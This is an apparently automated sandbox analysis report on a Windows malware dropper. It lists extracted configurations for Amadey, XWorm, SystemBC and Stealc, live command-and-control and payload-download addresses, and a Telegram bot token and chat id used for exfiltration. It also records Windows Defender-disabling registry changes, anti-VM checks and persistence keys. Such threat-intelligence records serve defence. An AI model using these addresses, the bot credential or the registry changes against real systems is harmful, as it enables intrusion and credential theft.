Analysis
-
max time kernel
119s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
22/02/2025, 07:47
Static task
static1
Behavioral task
behavioral1
Sample
5f8da7bbdafaed3095a2fef9f7caf45c.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5f8da7bbdafaed3095a2fef9f7caf45c.exe
Resource
win10v2004-20250217-en
General
-
Target
5f8da7bbdafaed3095a2fef9f7caf45c.exe
-
Size
2.0MB
-
MD5
5f8da7bbdafaed3095a2fef9f7caf45c
-
SHA1
595731a346e573a217c1030789f8dbf930280dc7
-
SHA256
91cb26a8c61b268414be31010f6a8e894bca70579775d4e1f0acc32da3201e12
-
SHA512
f8a01fdb8ad387de77dd9937046f32841540740c418adf101de0029710e7af0b66ed0930f89bf9d1ee28c6b4f151c57bd5b9f512026e0f177fa63826d974ea11
-
SSDEEP
49152:blUpxSuxR0/pUg5eJStVgOBnpujtzqqPRrM01GEZ3rQPzBwvtYyfRvaX2A:blUpxBxR0/pzeguObytzqarj/JYtwvna
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
amadey
5.21
a4d2cd
http://cobolrationumelawrtewarms.com
http://�������� jlgenfekjlfnvtgpegkwr.xyz
-
install_dir
a58456755d
-
install_file
Gxtuum.exe
-
strings_key
00fadbeacf092dfd58b48ef4ac68f826
-
url_paths
/3ofn3jf3e2ljk/index.php
Extracted
xworm
5.0
185.163.204.65:7000
SWaSxcOz2FkLWFU7
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042
Extracted
systembc
towerbingobongoboom.com
93.186.202.3
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Detect Poverty Stealer Payload 1 IoCs
resource yara_rule behavioral2/memory/1112-192-0x0000000000D10000-0x0000000001154000-memory.dmp family_povertystealer -
Detect Vidar Stealer 6 IoCs
resource yara_rule behavioral2/memory/1560-158-0x0000000000400000-0x0000000000850000-memory.dmp family_vidar_v7 behavioral2/memory/1560-175-0x0000000000400000-0x0000000000850000-memory.dmp family_vidar_v7 behavioral2/memory/1560-292-0x0000000000400000-0x0000000000850000-memory.dmp family_vidar_v7 behavioral2/memory/1560-408-0x0000000000400000-0x0000000000850000-memory.dmp family_vidar_v7 behavioral2/memory/1560-543-0x0000000000400000-0x0000000000850000-memory.dmp family_vidar_v7 behavioral2/memory/1560-667-0x0000000000400000-0x0000000000850000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0008000000023c75-385.dat family_xworm behavioral2/memory/3336-398-0x0000000000410000-0x0000000000440000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/6088-488-0x0000000000890000-0x0000000000CF6000-memory.dmp healer behavioral2/memory/6088-491-0x0000000000890000-0x0000000000CF6000-memory.dmp healer behavioral2/memory/6088-627-0x0000000000890000-0x0000000000CF6000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE -
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
-
Povertystealer family
-
Stealc family
-
Systembc family
-
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 27 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e984a62c31.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5fdc363345.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e0600fa4a5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ agndts.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5f8da7bbdafaed3095a2fef9f7caf45c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8QQOJj9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ uXivbut.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ebp51gY.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9222c12528.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 30a0979fbd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ftS1RPn.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ebp51gY.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8QQOJj9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ftS1RPn.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ uXivbut.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ video.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MAl7pjE.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7nSTXG6.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 140 5516 powershell.exe 160 5160 powershell.exe 176 748 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 5516 powershell.exe 5160 powershell.exe 748 powershell.exe 5216 powershell.exe 4048 powershell.exe 5896 powershell.exe -
Downloads MZ/PE file 29 IoCs
flow pid Process 309 3480 e984a62c31.exe 309 3480 e984a62c31.exe 309 3480 e984a62c31.exe 309 3480 e984a62c31.exe 309 3480 e984a62c31.exe 309 3480 e984a62c31.exe 140 5516 powershell.exe 160 5160 powershell.exe 176 748 powershell.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 10 3976 skotes.exe 132 3976 skotes.exe 132 3976 skotes.exe 132 3976 skotes.exe 132 3976 skotes.exe -
Uses browser remote debugging 2 TTPs 22 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4732 chrome.exe 4248 chrome.exe 1672 msedge.exe 6072 chrome.exe 1668 chrome.exe 548 msedge.exe 1848 msedge.exe 3692 chrome.exe 488 chrome.exe 3024 msedge.exe 2388 msedge.exe 4800 chrome.exe 6632 msedge.exe 6608 msedge.exe 4928 msedge.exe 2252 chrome.exe 4984 msedge.exe 3688 msedge.exe 5320 chrome.exe 1596 chrome.exe 548 chrome.exe 1660 chrome.exe -
Checks BIOS information in registry 2 TTPs 54 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion video.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e984a62c31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7nSTXG6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion agndts.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion agndts.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 30a0979fbd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7nSTXG6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5f8da7bbdafaed3095a2fef9f7caf45c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion video.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e984a62c31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5fdc363345.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5f8da7bbdafaed3095a2fef9f7caf45c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9222c12528.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 30a0979fbd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5fdc363345.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8QQOJj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9222c12528.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8QQOJj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8QQOJj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8QQOJj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e0600fa4a5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e0600fa4a5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ftS1RPn.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation 5f8da7bbdafaed3095a2fef9f7caf45c.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation uXivbut.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation 7nSTXG6.exe -
Executes dropped EXE 36 IoCs
pid Process 3976 skotes.exe 4828 MAl7pjE.exe 4528 lwtLxxH.exe 1560 7nSTXG6.exe 3696 ebp51gY.exe 1112 ftS1RPn.exe 5000 8QQOJj9.exe 3372 uXivbut.exe 4072 Gxtuum.exe 1104 e521e66b6b.exe 408 DF9PCFR.exe 1236 video.exe 3336 7tzlyz8.exe 5012 skotes.exe 4624 Gxtuum.exe 5012 agndts.exe 5324 36c0490467.exe 6088 TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE 5432 9222c12528.exe 3480 e984a62c31.exe 3884 483d2fa8a0d53818306efeb32d3.exe 5184 151f9773d5.exe 4992 5e812bac6f.exe 6592 30a0979fbd.exe 7104 TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE 2680 5fdc363345.exe 7020 d7efae0799.exe 4856 5a3fcf8817.exe 1036 skotes.exe 5676 Gxtuum.exe 6328 e0600fa4a5.exe 6556 ftS1RPn.exe 2684 ebp51gY.exe 6944 DF9PCFR.exe 1036 uXivbut.exe 224 8QQOJj9.exe -
Identifies Wine through registry keys 2 TTPs 27 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine MAl7pjE.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine video.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 9222c12528.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 7nSTXG6.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 8QQOJj9.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine uXivbut.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine e984a62c31.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 30a0979fbd.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine Gxtuum.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 5f8da7bbdafaed3095a2fef9f7caf45c.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine ebp51gY.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine agndts.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine e0600fa4a5.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine ftS1RPn.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine ebp51gY.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine uXivbut.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine ftS1RPn.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine Gxtuum.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine Gxtuum.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 5fdc363345.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 8QQOJj9.exe -
Loads dropped DLL 2 IoCs
pid Process 3480 e984a62c31.exe 3480 e984a62c31.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e984a62c31.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091315001\\e984a62c31.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\151f9773d5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091316001\\151f9773d5.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e812bac6f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091317001\\5e812bac6f.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\36c0490467.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091274101\\36c0490467.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091275021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9222c12528.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091314001\\9222c12528.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 48 ipinfo.io -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023c95-418.dat autoit_exe behavioral2/files/0x0007000000023ca7-608.dat autoit_exe behavioral2/files/0x0007000000023cb2-652.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs
pid Process 1192 5f8da7bbdafaed3095a2fef9f7caf45c.exe 3976 skotes.exe 4828 MAl7pjE.exe 1560 7nSTXG6.exe 3696 ebp51gY.exe 1112 ftS1RPn.exe 5000 8QQOJj9.exe 3372 uXivbut.exe 4072 Gxtuum.exe 1236 video.exe 5012 skotes.exe 4624 Gxtuum.exe 5012 agndts.exe 6088 TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE 5432 9222c12528.exe 3480 e984a62c31.exe 3884 483d2fa8a0d53818306efeb32d3.exe 6592 30a0979fbd.exe 7104 TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE 2680 5fdc363345.exe 5676 Gxtuum.exe 1036 skotes.exe 6328 e0600fa4a5.exe 6556 ftS1RPn.exe 2684 ebp51gY.exe 1036 uXivbut.exe 224 8QQOJj9.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1104 set thread context of 5108 1104 e521e66b6b.exe 128 PID 408 set thread context of 1252 408 DF9PCFR.exe 168 PID 1104 set thread context of 5800 1104 e521e66b6b.exe 226 PID 5108 set thread context of 6700 5108 AddInProcess32.exe 230 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\Test Task17.job video.exe File created C:\Windows\Tasks\skotes.job 5f8da7bbdafaed3095a2fef9f7caf45c.exe File created C:\Windows\Tasks\Gxtuum.job uXivbut.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 63 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebp51gY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uXivbut.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 30a0979fbd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7nSTXG6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e984a62c31.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uXivbut.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8QQOJj9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e521e66b6b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DF9PCFR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 151f9773d5.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 151f9773d5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e0600fa4a5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 